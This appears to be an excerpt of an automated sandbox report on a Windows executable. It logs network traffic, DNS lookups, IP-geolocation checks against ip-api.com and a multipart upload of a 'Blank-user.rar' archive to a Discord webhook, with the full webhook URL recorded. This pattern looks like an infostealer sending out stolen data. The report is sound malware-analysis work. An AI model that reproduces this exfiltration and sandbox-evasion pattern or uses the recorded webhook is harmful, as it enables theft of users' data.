Dec 13, 2024 08:38:38.888253927 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888269901 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888278008 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888292074 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888298035 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888370037 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888377905 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888391018 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888396978 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888416052 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888422012 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888441086 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888452053 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888461113 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888465881 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888475895 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888482094 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888501883 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888509989 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888525009 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888525009 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888530970 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888536930 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888556957 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888562918 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888575077 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888581038 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888593912 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888600111 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888611078 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888616085 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888641119 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888647079 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888662100 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888736963 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888772011 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888803959 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888812065 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888824940 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.935326099 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.935520887 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.935530901 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.935549021 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.935553074 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.935574055 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.935574055 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.935581923 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.935590029 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.935604095 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.935609102 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.935621023 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.935631037 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.935647011 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.935653925 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.935689926 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.935695887 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.935712099 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.935718060 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.935725927 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.935745001 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.938574076 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.938594103 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.938604116 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.938618898 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.938633919 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.938640118 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.938647032 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.938658953 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.938673973 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.983321905 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:40.361849070 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:40.361936092 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:40.362205029 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:40.363493919 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:40.902972937 CET	49795	80	192.168.2.11	208.95.112.1
Dec 13, 2024 08:38:41.023283958 CET	80	49795	208.95.112.1	192.168.2.11
Dec 13, 2024 08:38:41.023384094 CET	49795	80	192.168.2.11	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 08:37:59.362818003 CET	51233	53	192.168.2.11	1.1.1.1
Dec 13, 2024 08:37:59.590234041 CET	53	51233	1.1.1.1	192.168.2.11
Dec 13, 2024 08:38:02.190397978 CET	51443	53	192.168.2.11	1.1.1.1
Dec 13, 2024 08:38:02.330822945 CET	53	51443	1.1.1.1	192.168.2.11
Dec 13, 2024 08:38:35.802167892 CET	56803	53	192.168.2.11	1.1.1.1
Dec 13, 2024 08:38:35.939933062 CET	53	56803	1.1.1.1	192.168.2.11
Dec 13, 2024 08:38:37.503660917 CET	50055	53	192.168.2.11	1.1.1.1
Dec 13, 2024 08:38:37.641784906 CET	53	50055	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 08:37:59.362818003 CET	192.168.2.11	1.1.1.1	0xcb96	Standard query (0)	blank-jfr1z.in	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:02.190397978 CET	192.168.2.11	1.1.1.1	0xda45	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:35.802167892 CET	192.168.2.11	1.1.1.1	0xe3cd	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:37.503660917 CET	192.168.2.11	1.1.1.1	0xe59f	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 08:37:59.590234041 CET	1.1.1.1	192.168.2.11	0xcb96	Name error (3)	blank-jfr1z.in	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:02.330822945 CET	1.1.1.1	192.168.2.11	0xda45	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:35.939933062 CET	1.1.1.1	192.168.2.11	0xe3cd	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:37.641784906 CET	1.1.1.1	192.168.2.11	0xe59f	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:37.641784906 CET	1.1.1.1	192.168.2.11	0xe59f	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:37.641784906 CET	1.1.1.1	192.168.2.11	0xe59f	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:37.641784906 CET	1.1.1.1	192.168.2.11	0xe59f	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:37.641784906 CET	1.1.1.1	192.168.2.11	0xe59f	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

discord.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49716	208.95.112.1	80	7860	C:\Users\user\Desktop\sppawx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 08:38:02.489600897 CET	117	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
Dec 13, 2024 08:38:03.619998932 CET	175	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 07:38:02 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49795	208.95.112.1	80	7860	C:\Users\user\Desktop\sppawx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 08:38:36.062210083 CET	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
Dec 13, 2024 08:38:37.177577019 CET	381	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 07:38:36 GMT Content-Type: application/json; charset=utf-8 Content-Length: 204 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49799	162.159.135.232	443	7860	C:\Users\user\Desktop\sppawx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 07:38:38 UTC	302	OUT	POST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1 Host: discord.com Accept-Encoding: identity Content-Length: 694302 User-Agent: python-urllib3/2.2.3 Content-Type: multipart/form-data; boundary=4574e7a3c3bceb293e441457fd5f9388
2024-12-13 07:38:38 UTC	16384	OUT	Data Raw: 2d 2d 34 35 37 34 65 37 61 33 63 33 62 63 65 62 32 39 33 65 34 34 31 34 35 37 66 64 35 66 39 33 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 74 6f 74 74 69 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 b1 65 c0 61 21 04 00 00 01 0f 59 67 a0 66 eb e3 39 2d 23 28 3a 70 de cd e1 26 df f9 a0 22 49 b4 98 c5 2f 95 9d 63 be f7 bf 03 8e 07 ae 2c 5d 54 47 68 a3 36 da 54 6e 02 e6 74 d0 45 5e a5 11 28 d5 4b 87 07 5d 7b 2e 8f 67 83 8e ff ec d7 67 3d 9f d1 7a 5b bc e0 5b 6e 99 93 61 1e 44 46 d4 b2 Data Ascii: --4574e7a3c3bceb293e441457fd5f9388Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!ea!Ygf9-#(:p&"I/c,]TGh6TntE^(K]{.gg=z[[naDF
2024-12-13 07:38:38 UTC	16384	OUT	Data Raw: 1f 79 ee f1 57 d0 ff 97 15 b9 96 16 b1 6c 1a 82 82 f2 82 4e ea fd ff 11 a8 4d 85 c4 bc b7 e5 91 6c 6c 50 bb a3 75 a3 d5 0d a5 d8 b8 dd f5 9a 69 a2 b2 b4 87 ee df 0a 9d 3c 97 b4 9a f3 12 a2 02 0c ec b7 b4 50 b6 0a 7f 01 cd f2 d3 4e fa b5 a6 da f9 6c 1b e4 d2 27 1c 7d 99 54 95 ff b2 66 bf 7c af 4d db 4c 48 0c 2d ff b7 cf 81 2f e6 47 14 76 29 08 1f 3d 4a a2 d5 05 66 fb ae ce 4e f0 e9 a0 88 96 b3 72 ea a9 45 a0 c2 00 d1 6a 17 04 3b 65 df cc eb 0c a7 90 aa 0f 63 4a 19 e1 0f b0 11 7a 73 7c 75 a7 60 0c 16 d7 06 30 07 a7 f2 25 e0 6f 76 40 c1 4e 01 aa b0 79 40 af cb 64 e1 bc 7a c4 5a e1 1f 52 42 d1 a8 09 eb 39 bc ce 46 54 26 ec ac 9c 1a 58 6d 45 72 bd 08 e6 fc d4 60 80 6c 2c 37 f6 5c 1f 7d 70 69 ae a9 3f 43 38 65 75 42 5a 96 45 2d aa 46 1d f5 a0 5e e7 33 a5 5c 55 Data Ascii: yWlNMllPui<PNl'}Tf\|MLH-/Gv)=JfNrEj;ecJzs\|u`0%ov@Ny@dzZRB9FT&XmEr`l,7\}pi?C8euBZE-F^3\U
2024-12-13 07:38:38 UTC	16384	OUT	Data Raw: ed e4 37 79 25 f5 02 c2 15 04 a2 ec 71 52 05 8b 3f f6 e5 03 07 0a a0 6f de 65 fb 69 74 59 78 2c fe f9 ba 49 fd 74 4e 3c fe fd 24 12 3a d8 10 29 1c 52 a6 33 be c6 79 31 51 e5 f7 72 ef 52 4f 57 02 0f d0 ed 49 9e 11 f4 a6 97 9a 76 b1 be c1 83 c1 d8 cd 07 9e 29 dc b6 90 24 8d fe 15 e1 0a 70 4d 99 f6 9d 4a 8e 4f ff 57 92 20 e4 1a b0 58 51 c7 4f c5 df de 8a a6 c6 29 07 e6 22 7c 66 cd 59 9f d8 e2 8f 2d 12 bb 4d 81 45 e8 08 31 a8 91 ed 20 b7 9b 58 00 71 9f 26 0e fa 1c 66 ed b5 b7 5b 47 de e3 08 5b d2 13 fd 53 a5 e8 ea a7 71 1a 31 e5 09 4a 45 1d b5 22 73 09 4d ac a2 b3 73 d8 71 85 50 36 34 c3 72 d2 36 30 dd 25 ac 59 cd da a5 43 fa 14 ab 4c cd 35 0b 1e 62 51 96 a0 01 30 d8 47 27 94 f1 c2 70 73 c1 c3 90 69 f5 64 38 1d df e6 ed 37 33 7f 1a cb 2a 8e 96 40 45 5f 1b a8 Data Ascii: 7y%qR?oeitYx,ItN<$:)R3y1QrROWIv)$pMJOW XQO)"\|fY-ME1 Xq&f[G[Sq1JE"sMsqP64r60%YCL5bQ0G'psid873*@E_
2024-12-13 07:38:38 UTC	16384	OUT	Data Raw: e3 80 87 83 5c 4e a6 0d 1a 87 d4 7d 89 81 5e 56 bb f7 f7 aa 02 86 d8 ac ab 9b 56 e6 d0 b4 1b d2 61 af 24 96 6a eb 79 4a d8 b3 f8 2f 96 b4 77 3a df a8 27 c3 d6 a3 c4 fd a1 81 ad 14 03 83 57 4a 8a e2 e7 36 e5 2a 23 b4 a6 6f b0 11 8c 82 b8 0c b9 16 aa 98 b2 7a ef ed dc a5 fc 8a 6a f3 6e 43 2d 83 cd aa f7 d9 d4 b1 d0 ec a2 d9 e2 a7 c0 19 fe c8 1f fa 85 09 74 27 01 cf 48 4a 07 b2 6a 78 0e 5f ff dc 66 1d cb a7 c4 8a 3d ae 79 83 9c a4 da a5 61 d0 63 32 a8 d7 52 bc 05 dd 50 6a 68 e2 bc 18 a8 af 26 e2 94 01 36 ad 6b 57 fb c0 69 49 93 ad 58 a7 b4 81 66 98 d6 17 26 98 85 e9 99 75 14 5f 60 71 e6 25 a8 b3 3d 51 60 78 ff c7 67 22 33 b0 01 b6 dd 6a a4 80 a6 44 4e f3 a2 e8 d2 1b 39 e0 25 b6 fa 30 03 8e ad d5 2d 32 b5 7f 3d 37 cf 75 37 e5 c6 62 93 c2 35 4f ec 77 70 e0 6e Data Ascii: \N}^VVa$jyJ/w:'WJ6*#ozjnC-t'HJjx_f=yac2RPjh&6kWiIXf&u_`q%=Q`xg"3jDN9%0-2=7u7b5Owpn
2024-12-13 07:38:38 UTC	16384	OUT	Data Raw: be e4 9e a2 9c f5 c0 f8 84 90 25 57 33 4b 4d 9a 06 34 7d e6 13 10 c1 35 58 e5 5c bb 53 99 c3 95 2c 8d b5 b0 cc 83 88 9d 2f 1f 3e ab 8b e2 16 3e fd 02 7a 4d 15 d7 03 43 87 ec 04 f9 1e 93 1d f7 35 5d b5 e9 03 ed 69 69 82 62 f9 5e c3 16 65 45 07 68 c7 67 ba 4a 7b 9f 64 40 f1 65 56 5e 7a 98 81 4d ac ac 22 90 24 96 12 12 e6 2a c5 ec 64 89 27 87 df 08 9a 4d 70 25 61 d1 01 d7 1f 7d ad 7e 1e 1a e6 67 7b b2 93 83 b7 82 8a 35 ab 3b 7d 0b ae ed 0c 76 14 b4 a5 f5 c5 ea 90 a2 56 d7 78 5f da b6 2e a1 78 9b 44 b2 13 fb c3 91 ba 73 45 68 07 70 fb 43 10 64 44 d5 bd 5c 0d 53 f3 fd 9d 95 b0 e8 f4 53 19 ea d6 a0 54 d1 65 3a c8 05 7c d4 9d 6d 0b 2e e8 92 7b f9 fd 31 ec d4 09 3e 7c aa 6b e2 80 ec 5b e1 a6 f3 a8 f2 3a 37 cc c9 5a 0f b0 de c9 64 65 04 da 4f b3 c1 56 a9 f8 76 84 Data Ascii: %W3KM4}5X\S,/>>zMC5]iib^eEhgJ{d@eV^zM"$*d'Mp%a}~g{5;}vVx_.xDsEhpCdD\SSTe:\|m.{1>\|k[:7ZdeOVv
2024-12-13 07:38:38 UTC	16384	OUT	Data Raw: a5 fe 55 b2 34 ee 96 fc da eb 3b aa 8b 31 df eb 04 c1 ec f8 ad f2 e4 d4 03 43 78 f1 99 4b 63 49 77 52 57 b7 9f b2 82 1f f5 b1 fc 0b ca bb 98 8a 83 69 c2 a9 96 64 b5 59 e5 ce 85 5f 0c e8 82 78 4f 47 a1 d4 18 30 bd 33 61 b0 3d 84 57 01 71 1a 03 15 be a1 76 3c e7 db d9 2e 61 3f d2 a1 74 7a 68 cf ef f3 61 39 b8 ae 8d 6e f0 dc c5 ad b5 d5 c7 11 bf 7c fa b6 18 96 e1 e6 37 d1 d9 8e 16 0a c5 30 50 7a 98 04 27 68 24 49 3e 06 42 f3 4f 26 0a e2 de ce a6 63 a7 0f 4d a6 ea a7 f1 a6 0a a1 6c e5 a3 af 18 f9 7a 93 03 6d fe 0f d4 c5 3c bc 4c fc fb 5c c1 b4 a7 e8 1d 94 06 78 44 20 c2 13 f2 e5 d1 a8 2c 3b d7 42 31 98 7a 7a bb 4e 98 a8 ec 12 66 0f e4 55 8c 48 f6 60 8d ab 52 5f 15 56 6b 68 70 0e 26 c2 0a 38 8a c3 0e a0 34 1d 87 08 83 2b 96 34 4d 9d f9 e5 16 3d 8f e0 e9 d1 10 Data Ascii: U4;1CxKcIwRWidY_xOG03a=Wqv<.a?tzha9n\|70Pz'h$I>BO&cMlzm<L\xD ,;B1zzNfUH`R_Vkhp&84+4M=
2024-12-13 07:38:38 UTC	16384	OUT	Data Raw: ec 2f ab b3 ca 29 cc 57 c3 90 05 5f 5f f5 c5 4b dc 66 42 6c 10 27 fd 21 94 a2 1f 21 9a 4a f9 88 5f e5 4d a4 f2 b3 3f 18 b5 66 40 44 30 76 8e 10 9c 66 9b f8 04 12 05 af 00 19 81 8b 61 e9 84 af 79 4e e6 a3 aa 9b 3a d2 e5 60 ba cb 99 34 d3 96 c5 7e d6 0d b8 3e e7 ea 68 76 58 98 78 c6 c4 b7 9e bf af 1e 36 8b 3b 39 6f 47 8b 2a 5b b2 7d 5c e1 43 6d d5 bc 96 86 4b da 99 04 b5 83 11 4a 1e 90 8e e6 ca 1d 8a d4 81 ff 9d 79 ca f7 09 9f e2 b3 3e c0 42 56 bd 11 d8 a1 44 0d a8 1d 0f 84 95 7c 5f 83 fc 2c ec 92 bd 8d 43 3c b8 d7 ba 98 6e 27 6e 61 5b 55 c3 c6 8f 47 6e 6a b1 33 23 c7 ef 52 e9 9a e7 d7 48 d0 84 ca 71 92 47 3d 52 f8 1a 4f 51 cf 84 d1 0f 96 5d d6 f5 ce 4a 0d 12 3f 6e 32 58 3f 52 9f 09 7d ed 1d 36 ff 61 84 83 8b 2d c9 a9 0e b9 10 a1 92 55 08 df 62 f0 0a 1e f6 Data Ascii: /)W__KfBl'!!J_M?f@D0vfayN:`4~>hvXx6;9oG*[}\CmKJy>BVD\|_,C<n'na[UGnj3#RHqG=ROQ]J?n2X?R}6a-Ub
2024-12-13 07:38:38 UTC	16384	OUT	Data Raw: 67 26 39 47 be 38 6f da af 7a 8a 5e a0 e7 d6 1a 5d 37 be ff 09 5e cc e3 7e 0e c7 cc f3 c8 8a be d6 15 ef 4f 9a 69 91 0c 03 ee f3 4d c0 e4 94 f1 d2 5a a3 6b 36 7e 11 5f 7a 1d 71 ae dc 94 88 5f d3 40 cd ee 2d a5 86 94 49 cd d9 ca 7b 54 4a f2 16 88 8f 8c b3 9d fb 68 4b 03 b2 48 4d a9 37 5d 05 7e 87 6a df 1b 04 8d 50 87 ec b9 da b2 53 db 82 36 37 6c b7 24 99 50 b5 52 fc 4a 21 fa 4e 31 4e f7 31 25 35 75 23 f8 1e 11 54 40 4a ac 20 a7 87 76 15 04 1c a4 4d 3c 0d 4a e8 31 b5 5b c2 20 68 88 5e fd 12 e1 61 19 e1 2a fc b4 ba ca a0 e7 d6 55 f7 6e c5 ca f6 20 55 2a c1 24 99 2c e0 80 98 2e d0 51 71 e7 aa a6 ae 81 02 9b 4c 83 88 f5 cc cf c9 26 38 38 ac 71 b0 93 33 86 d5 a8 77 a9 66 d5 bd 91 ee c9 50 78 37 11 2b 8b 21 c7 a5 4d 26 37 6d 5a ea f6 61 32 ff 1e 34 3f 67 4f 1f Data Ascii: g&9G8oz^]7^~OiMZk6~_zq_@-I{TJhKHM7]~jPS67l$PRJ!N1N1%5u#T@J vM<J1[ h^aUn U$,.QqL&88q3wfPx7+!M&7mZa24?gO
2024-12-13 07:38:38 UTC	16384	OUT	Data Raw: 88 9e b9 18 07 a4 d8 f0 1b 0f ce d1 a0 51 c4 94 1a 18 03 26 87 c8 a0 ab 41 a9 7f 5b 56 d4 ee e2 bd d1 0c 0c 7c 60 98 21 8c 6b 5f ad 73 e4 90 43 8a b8 a9 95 a0 0b 32 c7 ca 7f 38 21 18 e0 62 b7 39 8f 42 60 aa b2 40 59 e1 41 74 7c 07 2e be 90 38 08 24 6b 5a 90 5f 98 74 87 03 67 b7 67 ae cc ae 9d f2 54 a2 53 57 8c 62 e0 30 84 03 a4 cc 78 4b 53 83 8b 0a 00 64 e2 d3 96 77 00 3b 8e 9c f0 9b d9 ec 73 8d 42 34 0c 43 bd ba 13 88 73 02 dc 0a cf 6c c7 b0 62 60 40 70 e4 08 ef d6 2e 14 5e e8 ae f9 36 1b fd bd a5 99 fa 48 bd cc 8d 4f 15 bf db df 62 98 b9 d8 99 05 c6 83 b8 08 7e 9a da 46 4b ee ae fe 17 76 cd 6b 08 f3 d8 f9 2a ea a8 9c 43 5c ae f0 ed 6d 90 6a d5 96 26 f4 5f 32 54 3d 2c a1 de 33 29 18 4f 92 d8 c3 9c 40 29 3f 33 47 5e 39 ef 1c ed b7 cc 45 9c 8b 65 8a 92 96 Data Ascii: Q&A[V\|`!k_sC28!b9B`@YAt\|.8$kZ_tggTSWb0xKSdw;sB4Cslb`@p.^6HOb~FKvk*C\mj&_2T=,3)O@)?3G^9Ee
2024-12-13 07:38:38 UTC	16384	OUT	Data Raw: 36 3d f2 c3 9c 98 42 65 dc 42 13 a4 24 1f 7f 6d 99 68 4f 4d 46 a2 fb 9b f5 02 3c 12 94 e1 7f 27 dc 72 ad ec 02 f7 53 ab da ca 30 fa d6 6a 0c 2b 7d 5b 1e 37 e2 e2 f2 f1 db 60 e2 60 87 50 48 67 3c c9 cc c9 9c 71 72 2f d1 3c 6b 04 5d f3 f4 79 62 1e 57 3d a3 78 f6 76 78 ff 86 f8 79 d0 92 ed 42 70 aa 8d 91 8e 7e 2c dd 52 51 52 82 36 27 47 d8 59 e8 06 a8 79 bc 6b 86 64 0c 9e 05 a7 84 84 7f 19 eb 06 87 7c 92 7a 16 7c 70 ec d4 6d f2 2c 51 eb 8b b0 29 63 c4 3d 72 55 5e 7f e4 dc 6a c7 a0 5c d2 92 0b e9 ee 24 88 9b d2 8a 93 10 46 97 91 c9 4c 94 97 6e db c1 a5 c8 72 46 0a 98 02 3e 6d da 9f 9e ae 21 5e b9 85 e9 1a 53 fb d1 10 18 a9 70 fc 22 57 03 d8 48 63 12 b0 49 a3 f5 8b 6e b8 28 16 62 1f 1e 04 ba 29 64 16 da 86 21 f7 e8 a5 7f c5 73 3c 6a 85 cd 7f 65 c6 a4 a6 16 15 Data Ascii: 6=BeB$mhOMF<'rS0j+}[7``PHg<qr/<k]ybW=xvxyBp~,RQR6'GYykd\|z\|pm,Q)c=rU^j\$FLnrF>m!^Sp"WHcIn(b)d!s<je
2024-12-13 07:38:40 UTC	1265	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 07:38:40 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1734075521 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tx%2BJOy3W%2Fj6%2FZNhfBMrLuKCjk2aniXvX%2Bevuba68UlAfsef62gGbltAlNJ1TBi%2BhHRmPnZnM1fNgXqNAS3R2E6O%2FdyIWFAugz4daKez7DSO%2FfNDcG4xbQSJQ31%2Bl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=7c9e703a624a385c05903c9da053e83e56587a9a-1734075520; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=kMelNpAhNdRlaZ1Uw0BI93eBNOmpVEH9iE4vc1SB4ww-1734075520206-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8f144bba1e6742d7-EWR

Target ID:	0
Start time:	02:37:54
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\sppawx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\sppawx.exe"
Imagebase:	0x7ff79a310000
File size:	7'834'524 bytes
MD5 hash:	546606959CB5B178D679B203D938CF88
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
